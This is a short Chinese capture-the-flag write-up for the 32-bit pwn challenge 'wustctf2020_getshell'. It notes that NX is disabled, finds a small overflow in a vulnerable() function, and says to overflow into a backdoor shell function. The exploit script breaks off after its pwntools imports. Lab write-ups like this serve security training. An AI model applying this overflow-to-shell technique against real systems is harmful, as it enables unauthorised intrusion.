wustctf2020_getshell
# 1. 查看程序
查看程序开启的保护
32 位程序,没有开启 NX,猜测可以使用 shellcode
利用 ida 反汇编
主函数
init():输出图形
vulnerable () :可以进行溢出,但是溢出范围很小
发现有后门命令在 shell 函数里
直接溢出执行该命令即可
# exp
nfrom pwn import *from LibcSearcher import *context.log_level = 'debug'#p=process('./wustctf2020_getshell')p=
more...